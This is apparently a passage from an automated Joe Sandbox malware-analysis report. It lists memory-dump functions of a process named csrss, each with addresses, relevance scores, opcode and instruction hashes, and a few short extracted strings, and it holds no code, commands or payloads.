                                                      • Source File: 00000027.00000002.2300839183.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_39_2_7ff848e80000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3434e4c200470a55205a769e0bdb57b0bd16550e86ef3948b0a85cc92d65b229
                                                      • Instruction ID: 4aa18af1f661fabb0a2e2203a43a442a2c3407ad42402b65ed2ba776a251d591
                                                      • Opcode Fuzzy Hash: 3434e4c200470a55205a769e0bdb57b0bd16550e86ef3948b0a85cc92d65b229
                                                      • Instruction Fuzzy Hash: D6C08C305108088FC908FB28C88480837A0FF09200BC20090E008C7170D229DCC1D741
                                                      Function 00007FF848E84E07 Relevance: .0, Instructions: 10COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000027.00000002.2300839183.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_39_2_7ff848e80000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4960593f5e9ba63c91db8bb8f67d76f049f51e4c57264b9b0e026604b0ed6b80
                                                      • Instruction ID: 01d19c03aeb6c287f6621aa3ee205c62654490548f330472fe0212c3aa7f6b12
                                                      • Opcode Fuzzy Hash: 4960593f5e9ba63c91db8bb8f67d76f049f51e4c57264b9b0e026604b0ed6b80
                                                      • Instruction Fuzzy Hash: B7C08C06E0EC169AE35A320440221BE44029F80784F9400B5E00E873CADF0C1E0652CA
                                                      Function 00007FF848E806D0 Relevance: .0, Instructions: 8COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000027.00000002.2300839183.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_39_2_7ff848e80000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a78a74dc4bf2f834ffd4e85e6ada64bb77668f280636e538a7a23ceeaa807a1d
                                                      • Instruction ID: 37703ee556c4e8627d10b7c80c769574e06979db5dbbed10f1728ee220f40bb0
                                                      • Opcode Fuzzy Hash: a78a74dc4bf2f834ffd4e85e6ada64bb77668f280636e538a7a23ceeaa807a1d
                                                      • Instruction Fuzzy Hash: 0BB01200C5E40F04E40431BB084306C70407FC4244FC10070D40C41182E97D1094025A

                                                      Non-executed Functions

                                                      Function 00007FF848E809B0 Relevance: 5.2, Strings: 4, Instructions: 191COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000027.00000002.2300839183.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_39_2_7ff848e80000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: c9$!k9$"s9$#{9
                                                      • API String ID: 0-1692736845
                                                      • Opcode ID: bfa2c339f050b900016796cb309f7cc88d50831665c47b0694f3740441f1cca7
                                                      • Instruction ID: d8d3bf98ff88aa51002e8d513fa4bc641ecc0acbef1d3040d477bc56c04107bd
                                                      • Opcode Fuzzy Hash: bfa2c339f050b900016796cb309f7cc88d50831665c47b0694f3740441f1cca7
                                                      • Instruction Fuzzy Hash: 9F515ED6ADE86A7DE61D36BDB4111FD6B44EF812B5F4C93B7E04C890838E18608186FD

                                                      Executed Functions

                                                      Function 00007FF848E60D48 Relevance: 2.8, Strings: 2, Instructions: 263COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000002D.00000002.2364629768.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_45_2_7ff848e60000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 5[_H$<O_^
                                                      • API String ID: 0-4097811043
                                                      • Opcode ID: 4020ef3c2d1b768e02ed8f39c311f0facdb46bc356a953bd1537a06f47c18d54
                                                      • Instruction ID: 408abc039804a0bc5a240e3e1b6b1f635399829ddc144950961d6821ecb393ee
                                                      • Opcode Fuzzy Hash: 4020ef3c2d1b768e02ed8f39c311f0facdb46bc356a953bd1537a06f47c18d54
                                                      • Instruction Fuzzy Hash: 7F91F2B5A1DA998FE749AB28C8257A97FE1FF96350F4401BAC00AE73D2DB781404C711
                                                      Function 00007FF848E714BB Relevance: .8, Instructions: 777COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000002D.00000002.2364629768.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_45_2_7ff848e70000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e25427d1668d1d2a177894b21f70d136b758917e06ddb9cf52aa004bb5997c63
                                                      • Instruction ID: a12e5ac3698a1a86baffb64a55fc1c7a838e973e0ba981fe8812b6925ed4c111
                                                      • Opcode Fuzzy Hash: e25427d1668d1d2a177894b21f70d136b758917e06ddb9cf52aa004bb5997c63
                                                      • Instruction Fuzzy Hash: BC32A331E1CD5A9FEA98FA2884516B973A2FF94780F5445B9C40EC32C7DF38AC428785
                                                      Function 00007FF848E938ED Relevance: 1.5, Strings: 1, Instructions: 282COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000002D.00000002.2364629768.00007FF848E91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E91000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_45_2_7ff848e91000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: K_H
                                                      • API String ID: 0-313846638
                                                      • Opcode ID: 86ee436aa5fa306c6a774ae93fc70dbaf80114297c2dcd94af70568608a29878
                                                      • Instruction ID: caa1196e0f46fb3bd8837376e205d593e9dd25cab37fe1390c41d1509c788cb7
                                                      • Opcode Fuzzy Hash: 86ee436aa5fa306c6a774ae93fc70dbaf80114297c2dcd94af70568608a29878
                                                      • Instruction Fuzzy Hash: D181E021E1C98A5FEA98FA6C84563B963D2FF54784F0451B9D40EC32D7DEB8AC418285
                                                      Function 00007FF848E93943 Relevance: 1.5, Strings: 1, Instructions: 217COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000002D.00000002.2364629768.00007FF848E91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E91000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_45_2_7ff848e91000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: K_H
                                                      • API String ID: 0-313846638
                                                      • Opcode ID: 7006af376b87a4a72ee12f6def368957f768f2ebe42d7ad1dc79373e0f4f1f8f
                                                      • Instruction ID: 89fd55b971723e5f79bfdf67157a95ffc6b3ec2cb6bf88e43468aed95f29847b
                                                      • Opcode Fuzzy Hash: 7006af376b87a4a72ee12f6def368957f768f2ebe42d7ad1dc79373e0f4f1f8f
                                                      • Instruction Fuzzy Hash: CD51BF20E1C94E5FEA98FA6CC4567B9B3D2FF94794F049579C40EC3287DEB8A8414385
                                                      Function 00007FF848E739F9 Relevance: 1.3, Strings: 1, Instructions: 29COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000002D.00000002.2364629768.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_45_2_7ff848e70000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: M
                                                      • API String ID: 0-3664761504
                                                      • Opcode ID: c077d0536f444b8a9f7ca755632c820e59539509f58fcf9ef1d7ffdc6d030a66
                                                      • Instruction ID: 47ff2941b830ae47be1a686156ec20d976ea6786175147e52c3ac6ea4a1954c6
                                                      • Opcode Fuzzy Hash: c077d0536f444b8a9f7ca755632c820e59539509f58fcf9ef1d7ffdc6d030a66
                                                      • Instruction Fuzzy Hash: 9DF09B7190E7C54FC716EA3488694547FA0EF6720174A41EEC045CF1A3EA2DDC85C701
                                                      Function 00007FF848E921E9 Relevance: 1.3, Strings: 1, Instructions: 29COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000002D.00000002.2364629768.00007FF848E91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E91000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_45_2_7ff848e91000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: M
                                                      • API String ID: 0-3664761504
                                                      • Opcode ID: a3fc98c30183d817befaad58a7f6e55f14bd32c80d85a2e1cf28a36eda82bfc1
                                                      • Instruction ID: b124d02e397c1a7b8d0303321a6513e14cd487888f4127425d5d9bfeb77e7c54
                                                      • Opcode Fuzzy Hash: a3fc98c30183d817befaad58a7f6e55f14bd32c80d85a2e1cf28a36eda82bfc1
                                                      • Instruction Fuzzy Hash: D7F06D7194E7C44FCB1AEA348868454BFA0EF6721174A41EEC056CF1A7EA6D8885C701
                                                      Function 00007FF848E9ADE9 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000002D.00000002.2364629768.00007FF848E91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E91000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_45_2_7ff848e91000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: I
                                                      • API String ID: 0-3707901625
                                                      • Opcode ID: bb9db8f43b936f5a9276f2212608ea6e09e5ea1b7c496b4efdb6c600900496e4
                                                      • Instruction ID: 3fdafac0eca549572a7c9544ab130378ecd1bed7e7640abfe0a55f293b209eef
                                                      • Opcode Fuzzy Hash: bb9db8f43b936f5a9276f2212608ea6e09e5ea1b7c496b4efdb6c600900496e4
                                                      • Instruction Fuzzy Hash: 9FE0487144E7D44FCB06EB7484698553FA0EF67615B8A40DEC045CF1B3E66D988AC701
                                                      Function 00007FF848E92279 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000002D.00000002.2364629768.00007FF848E91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E91000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_45_2_7ff848e91000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: I
                                                      • API String ID: 0-3707901625
                                                      • Opcode ID: 14e9cd2fd34bdcd1ab25e42f361d0aa4373e0c220ce9b71c60bbb481b855a50b
                                                      • Instruction ID: a1ead72dabc0c1e0d961b4c791e8f8e33dcaf56f56cd3c594ab1bc0e3267adef
                                                      • Opcode Fuzzy Hash: 14e9cd2fd34bdcd1ab25e42f361d0aa4373e0c220ce9b71c60bbb481b855a50b
                                                      • Instruction Fuzzy Hash: CDE01A7184E7C44FCB4AEB74886A9943FA0EE6B21578A40EEC045CF1B3E62D8849C701
                                                      Function 00007FF848E980D9 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000002D.00000002.2364629768.00007FF848E91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E91000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_45_2_7ff848e91000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: I
                                                      • API String ID: 0-3707901625
                                                      • Opcode ID: 1d4c0adb280a7b74bed20475f351d23ccb1b6fc6b23704964918a18213da3daa
                                                      • Instruction ID: 529866176ef0b688c76d809301fc431a556a99169a3855fceffe04aa7ab50ff9
                                                      • Opcode Fuzzy Hash: 1d4c0adb280a7b74bed20475f351d23ccb1b6fc6b23704964918a18213da3daa
                                                      • Instruction Fuzzy Hash: BBE0127184E7D44FCB06EB7488798557FA0EE6725174B41EEC045CF1B3D62D8845C701
                                                      Function 00007FF848E608D0 Relevance: .1, Instructions: 137COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000002D.00000002.2364629768.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_45_2_7ff848e60000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9928631c9f6a249ae11015b69c8b5595aed794c39e79fca57d4a1d7aac640ad8
                                                      • Instruction ID: 06b1e93188f86e0c135f2098256fa1a125513a1917ab1dfc185d2ded79b5ee3a
                                                      • Opcode Fuzzy Hash: 9928631c9f6a249ae11015b69c8b5595aed794c39e79fca57d4a1d7aac640ad8
                                                      • Instruction Fuzzy Hash: 1F416A52E4D9A62EE309B37CA0992FC6B81FF853A5F1844BBD14DC71D3DE1878818698
                                                      Function 00007FF848E60998 Relevance: .1, Instructions: 99COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000002D.00000002.2364629768.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_45_2_7ff848e60000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 03a358588bfd1e6dd2f5bc51744d667e2133e5b99e7e7a37cd118556a837a8cf
                                                      • Instruction ID: 4acf8255f491e5f9505a0ff8bb1317ddb28f86f45e43d54343dd1c5afc705f61
                                                      • Opcode Fuzzy Hash: 03a358588bfd1e6dd2f5bc51744d667e2133e5b99e7e7a37cd118556a837a8cf
                                                      • Instruction Fuzzy Hash: 9721F320B1D9595FE788B62C9449A7977C2FF99351F5400BAE40EC32D7DE28AC818289
                                                      Function 00007FF848E61171 Relevance: .1, Instructions: 95COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000002D.00000002.2364629768.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_45_2_7ff848e60000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: fe1206d3ed81d1b5a5f6e37d6a9545a97959241a870341c55d7148242be3b9ac
                                                      • Instruction ID: dfdc91b9ee1e7b09fcda45fbe738a8d89dc66b39d6ab7b2323a3490a79ad55d2
                                                      • Opcode Fuzzy Hash: fe1206d3ed81d1b5a5f6e37d6a9545a97959241a870341c55d7148242be3b9ac
                                                      • Instruction Fuzzy Hash: 8131903190D68A8FDB46EB28C8599A97BF0FF56340F4805FBC009E71A2DB39A845C751
                                                      Function 00007FF848E92979 Relevance: .1, Instructions: 93COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000002D.00000002.2364629768.00007FF848E91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E91000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_45_2_7ff848e91000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ad36c1f08fd26e5e1104a0608639e393b015a2cdc59c07d35dad339c2ff915ac
                                                      • Instruction ID: 01552d8fddd2b0135b23e515cc38ad364daa7b1b6922fa251f3b870ec48001fb
                                                      • Opcode Fuzzy Hash: ad36c1f08fd26e5e1104a0608639e393b015a2cdc59c07d35dad339c2ff915ac
                                                      • Instruction Fuzzy Hash: 76318631E0C94A8FEB54EA58C495AB973A2FB98354F04467AC01ED72C7CF78AC418785
                                                      Function 00007FF848E60960 Relevance: .1, Instructions: 91COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000002D.00000002.2364629768.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_45_2_7ff848e60000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 95d34435ff7d6af0bc2c430a912ad87c7063ecc15d2ef110d1a727986c5c54b4
                                                      • Instruction ID: 71039aad425769ed0e19939dca2db01dfd8e59a8071d5dfd5e29c62db84100cd
                                                      • Opcode Fuzzy Hash: 95d34435ff7d6af0bc2c430a912ad87c7063ecc15d2ef110d1a727986c5c54b4
                                                      • Instruction Fuzzy Hash: 4821D051E4DD5A3EF658B27C644A6F967C2FF483A1F5844BAE40DC31D3DE28BC804698
                                                      Function 00007FF848E62A19 Relevance: .1, Instructions: 86COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000002D.00000002.2364629768.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_45_2_7ff848e60000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 74a5bc95528279d0bf9efaf27905a9ea30d52b67ed0fbb62744051dd28b87582
                                                      • Instruction ID: 46013800c90834bb859a11db80516c945551bd244e4f492b285ca7f6029c2a4c
                                                      • Opcode Fuzzy Hash: 74a5bc95528279d0bf9efaf27905a9ea30d52b67ed0fbb62744051dd28b87582
                                                      • Instruction Fuzzy Hash: 66216021E0C91A4FEAA4FA2884587B822D2FF94390F9446B6D40DF32D3DF78BC408749
                                                      Function 00007FF848E60C25 Relevance: .1, Instructions: 79COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000002D.00000002.2364629768.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_45_2_7ff848e60000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e6f8177d9203ac98609e71a9b848ceb7b675209a8ae8d25e95ccfa57ca7274bb
                                                      • Instruction ID: 9019beb1a0b2ee2db5800796c23ac505697e347d6cb07949201b6d1c08ce48e6
                                                      • Opcode Fuzzy Hash: e6f8177d9203ac98609e71a9b848ceb7b675209a8ae8d25e95ccfa57ca7274bb
                                                      • Instruction Fuzzy Hash: 8F21D331A0D6999FE711FB28C4452EC7FA0FF42360F5545B6C044FB1C2DB3829898755
                                                      Function 00007FF848E76D44 Relevance: .1, Instructions: 66COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000002D.00000002.2364629768.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_45_2_7ff848e70000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 69b3c7983ce58908a4cd32e603136205f0f02f971fbb2aafebc2ff12a22fd4e2
                                                      • Instruction ID: 67a6eb3ff0139141714dc92bf27de1e7d90bd7c2eb160065a79604a0b3069690
                                                      • Opcode Fuzzy Hash: 69b3c7983ce58908a4cd32e603136205f0f02f971fbb2aafebc2ff12a22fd4e2
                                                      • Instruction Fuzzy Hash: 4B114F21E1C91A4FFA98FB2884556B87292FF98340F6405B9D40ED72D6DF38AC024784
                                                      Function 00007FF848E63D85 Relevance: .1, Instructions: 54COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000002D.00000002.2364629768.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_45_2_7ff848e60000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 568aae5f4c562acde53c279bae93d09b133feb386604ca98fa70b15f257dc77e
                                                      • Instruction ID: 47885c3a409097ec158d5b6332351776d12aec3b2f11c4dae18d916e4d89da48
                                                      • Opcode Fuzzy Hash: 568aae5f4c562acde53c279bae93d09b133feb386604ca98fa70b15f257dc77e
                                                      • Instruction Fuzzy Hash: D711DA70D08A198FDB94EB09C894BA973E1FB58315F5541AAD40EE7290CB34AEC5CF85
                                                      Function 00007FF848E60C38 Relevance: .1, Instructions: 53COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000002D.00000002.2364629768.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_45_2_7ff848e60000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 893427cabd90b9adc6bb90f9f073489abb9a61f46fa982472e1b64fda8483e5f
                                                      • Instruction ID: 17694e1a09c135b95e7514d67183e2b7774c3c39c66e6200dfe7267fae4a3ed7
                                                      • Opcode Fuzzy Hash: 893427cabd90b9adc6bb90f9f073489abb9a61f46fa982472e1b64fda8483e5f
                                                      • Instruction Fuzzy Hash: D611E135A0D7999FE702FB38C4402DC7FB0FF82360F5544B6C080EB292D63826498784
                                                      Function 00007FF848E97180 Relevance: .0, Instructions: 50COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000002D.00000002.2364629768.00007FF848E91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E91000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_45_2_7ff848e91000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 070aff2842b219d20710d49355332a30556335885e1bc23de92677ed733dbae0
                                                      • Instruction ID: 20a97ef6c514553b9f7ebbb0fead66c4ceaa6566b3ab7ba7e4282ef7dcf82485
                                                      • Opcode Fuzzy Hash: 070aff2842b219d20710d49355332a30556335885e1bc23de92677ed733dbae0
                                                      • Instruction Fuzzy Hash: 28012B55D8EA523DD70D7678B8550F87B90DF0223DF0C91B7D08C890A3DE0C54888798
                                                      Function 00007FF848E9D67A Relevance: .0, Instructions: 50COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000002D.00000002.2364629768.00007FF848E91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E91000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_45_2_7ff848e91000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a501868e1dec0a386fa46edbce955c57be68ba20cfcef4a23473af80919ee4d0
                                                      • Instruction ID: 0ee6f854765ff7657eb20b58a66f1b22f9dea33b9e4faab00419228e88822f3f
                                                      • Opcode Fuzzy Hash: a501868e1dec0a386fa46edbce955c57be68ba20cfcef4a23473af80919ee4d0
                                                      • Instruction Fuzzy Hash: B0018833F089198FEB54DA98D4807FC77A1FF98394F054031D11DE7286DB75A8858754
                                                      Function 00007FF848E60C40 Relevance: .0, Instructions: 47COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000002D.00000002.2364629768.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_45_2_7ff848e60000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 51579a85f28c57a4665a358867c34d433bbd809ec7e43d2ccd29de3fdc2ef011
                                                      • Instruction ID: da91f375dc5599344ca1df00f15f25292241926f59e6661ae6487aab0bb471cd
                                                      • Opcode Fuzzy Hash: 51579a85f28c57a4665a358867c34d433bbd809ec7e43d2ccd29de3fdc2ef011
                                                      • Instruction Fuzzy Hash: 5D018C35A0D7999FE702FB28C4442DDBFB0FF42360F5545B6C080EB292DA386A498B84
                                                      Function 00007FF848E744B1 Relevance: .0, Instructions: 44COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000002D.00000002.2364629768.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_45_2_7ff848e70000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 29a598c12b0ad6440d483ebdc65bc084794b08604eb2785d2b2fceff1e46938f
                                                      • Instruction ID: dd01ee92180bff2e5874e42875fdcc9f89b96b25fcd15fd5d170a9757a2e9270
                                                      • Opcode Fuzzy Hash: 29a598c12b0ad6440d483ebdc65bc084794b08604eb2785d2b2fceff1e46938f
                                                      • Instruction Fuzzy Hash: FCF04C31D0C5C60FE722B62484142B937D1BFA2354F1902BBC04EC71D3EE3C69068355
                                                      Function 00007FF848E7833C Relevance: .0, Instructions: 42COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000002D.00000002.2364629768.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_45_2_7ff848e70000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9d29f0a1f51d6aba5a1fe26120a8fe4d0c097da875499dd364edbf8189fab624
                                                      • Instruction ID: 65ab98226ea14b3818fb023a67ae8b1728b0491f96642e3fe4b7401e3dbecc08
                                                      • Opcode Fuzzy Hash: 9d29f0a1f51d6aba5a1fe26120a8fe4d0c097da875499dd364edbf8189fab624
                                                      • Instruction Fuzzy Hash: 3B018B21E0C95A8FFA94FA188455AB83391FF69340F2441B6D80DE32C6DF387D428B85
                                                      Function 00007FF848E60C48 Relevance: .0, Instructions: 41COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000002D.00000002.2364629768.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_45_2_7ff848e60000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c707df45b09e2ea01fecd6e8552cff513fe671ba12c746fc173e8b05b00d0663
                                                      • Instruction ID: 350b085cc9f45d6b72126a22592a5e4c0f9cb2c449459990c362e321c0736669
                                                      • Opcode Fuzzy Hash: c707df45b09e2ea01fecd6e8552cff513fe671ba12c746fc173e8b05b00d0663
                                                      • Instruction Fuzzy Hash: 5E017C7190D7899FE702EB78C8442DDBFB0FF42354F5541E6D040EB292DA386A49C781
                                                      Function 00007FF848E64F0E Relevance: .0, Instructions: 40COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000002D.00000002.2364629768.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_45_2_7ff848e60000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7dfa7646bae5b0254ed607296bc6babf409d3659c783d62767eb7bc842bd6d2f
                                                      • Instruction ID: f22c6d4d30e0b7f517de5b96528b2059017bd87058518a2ff8d054c93e68f8bf
                                                      • Opcode Fuzzy Hash: 7dfa7646bae5b0254ed607296bc6babf409d3659c783d62767eb7bc842bd6d2f
                                                      • Instruction Fuzzy Hash: AD018F31E0D5668FEBA2BA28C45467867A1FF64360F9401FAC40EF3296DF397D418785
                                                      Function 00007FF848E9B0D2 Relevance: .0, Instructions: 38COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000002D.00000002.2364629768.00007FF848E91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E91000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_45_2_7ff848e91000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 11b57648d06f4049cb550231332112843bc6b473e8c6af1a822caa206d40c1d8
                                                      • Instruction ID: de7f0fbd1c5376da6d5c07bb3f36f661eecdce47d03c1aa13690e376b0334c3d
                                                      • Opcode Fuzzy Hash: 11b57648d06f4049cb550231332112843bc6b473e8c6af1a822caa206d40c1d8
